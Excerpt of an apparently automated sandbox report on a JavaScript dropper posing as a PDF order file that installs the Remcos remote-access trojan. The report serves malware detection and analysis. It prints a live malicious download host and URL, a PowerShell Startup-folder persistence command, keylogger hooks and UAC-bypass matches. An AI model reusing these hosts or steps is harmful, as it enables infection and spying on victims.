            Source: powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.drString found in binary or memory: https://sectigo.com/CPS0
            Source: wscript.exe, 00000000.00000003.310975197.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.271504600.0000018AB4BD8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.254098907.0000018AB4B7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.271812767.0000018AB4BDA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.256263555.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.264316692.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.259272464.0000018AB4B7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.264517204.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.264888526.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.272637988.0000018AB4BDB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.269402781.0000018AB4BDA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.310324374.0000018AB4BA4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.271642896.0000018AB4BDA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.305930733.0000018AB4B7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.250349589.0000018AB4B7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.271078919.0000018AB4BD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.262199095.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.311408292.0000018AB4BA4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.302956200.0000018AB4BA4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.333468672.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265232737.0000018AB4B7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tgc8x.tk/tt/VNZVNCXKKJSF.exe
            Source: wscript.exe, 00000000.00000003.330576085.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.271757510.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.263690422.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.268366678.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.256906649.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.255312802.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.254064481.0000018AB4B6C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.250150561.0000018AB4B7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.331377637.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.309049295.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.264679771.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.332128622.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.250282440.0000018AB4B7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.308651780.0000018AB4B7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.332656131.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.250225824.0000018AB4B7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.336031702.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.310975197.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.254098907.0000018AB4B7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.256263555.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.264316692.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tgc8x.tk/tt/VNZVNCXKKJSF.exei_g
            Source: wscript.exe, 00000000.00000003.250114367.0000018AB4B65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tgc8x.tk/tt/VNZVNCXKKJSF.exepo
            Source: unknownDNS traffic detected: queries for: tgc8x.tk
            Source: global trafficHTTP traffic detected: GET /tt/VNZVNCXKKJSF.exe HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tgc8x.tkConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 50.115.174.192:443 -> 192.168.2.6:49710 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
            Source: Systedbddfm.exe, 00000011.00000002.702879498.0000000000F1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.700880985.0000000001457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: VNZVNCXKKJSF.exe PID: 5516, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 480, type: MEMORYSTR

            System Summary

            barindex
            Source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: VNZVNCXKKJSF.exe PID: 5516, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: RegSvcs.exe PID: 480, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeJump to dropped file
            Source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: VNZVNCXKKJSF.exe PID: 5516, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: RegSvcs.exe PID: 480, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02D163D811_2_02D163D8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02D1D75811_2_02D1D758
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02D15A3811_2_02D15A38
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02D1132811_2_02D11328
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02D1966011_2_02D19660
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02D1B75011_2_02D1B750
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02D1444A11_2_02D1444A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02D1446011_2_02D14460
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02D18E5811_2_02D18E58
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02D1CE2011_2_02D1CE20
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02D1BC3811_2_02D1BC38
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02D86B7811_2_02D86B78
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02D87FF111_2_02D87FF1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02D8278011_2_02D82780
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02DBAAD811_2_02DBAAD8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02DB0AA811_2_02DB0AA8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeCode function: 17_2_00EE104017_2_00EE1040
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeCode function: 17_2_00EEE3B017_2_00EEE3B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeCode function: 17_2_00EE16E117_2_00EE16E1
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeCode function: 17_2_00EE783B17_2_00EE783B
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeCode function: 17_2_00EEACB017_2_00EEACB0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeCode function: 17_2_00EEBD1817_2_00EEBD18
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeCode function: 17_2_00EEE8D017_2_00EEE8D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeCode function: 17_2_0502B7B017_2_0502B7B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeCode function: 17_2_05022E5017_2_05022E50
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeCode function: 17_2_0502004017_2_05020040
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeCode function: 17_2_05023FD817_2_05023FD8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeCode function: 17_2_05023FE817_2_05023FE8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_0497AD7818_2_0497AD78
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_07A6C5F018_2_07A6C5F0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_07A63F4018_2_07A63F40
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_07A63F4018_2_07A63F40
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_07A6EB4818_2_07A6EB48
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_0497749018_2_04977490
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_0497748318_2_04977483
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_0497AE0318_2_0497AE03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_0497AE4018_2_0497AE40
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
            Source: Order Specifications PDF.jsInitial sample: Strings found which are bigger than 50
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeSection loaded: mscorjit.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeSection loaded: mscorjit.dllJump to behavior
            Source: VNZVNCXKKJSF[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: VNZVNCXKKJSF.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Systedbddfm.exe.11.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Order Specifications PDF.jsReversingLabs: Detection: 26%
            Source: Order Specifications PDF.jsVirustotal: Detection: 25%
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Specifications PDF.js"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe "C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe"
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell" Copy-Item 'C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe'
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell" Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe'
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe "C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell" Copy-Item 'C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe'Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell" Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe'Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWNJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeJump to behavior
            Source: classification engineClassification label: mal100.spre.troj.adwa.spyw.evad.winJS@14/10@1/2
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4876:120:WilError_01
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-CMFPLR
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: RuDl.pdb source: VNZVNCXKKJSF.exe, 0000000A.00000002.414602354.0000000002920000.00000004.08000000.00040000.00000000.sdmp, VNZVNCXKKJSF.exe, 0000000A.00000002.414888406.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, Systedbddfm.exe, 00000011.00000002.707496328.0000000002C50000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\VNZVNCXKKJSF.pdbBSJB source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr
            Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\VNZVNCXKKJSF.pdb source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr

            Data Obfuscation

            barindex
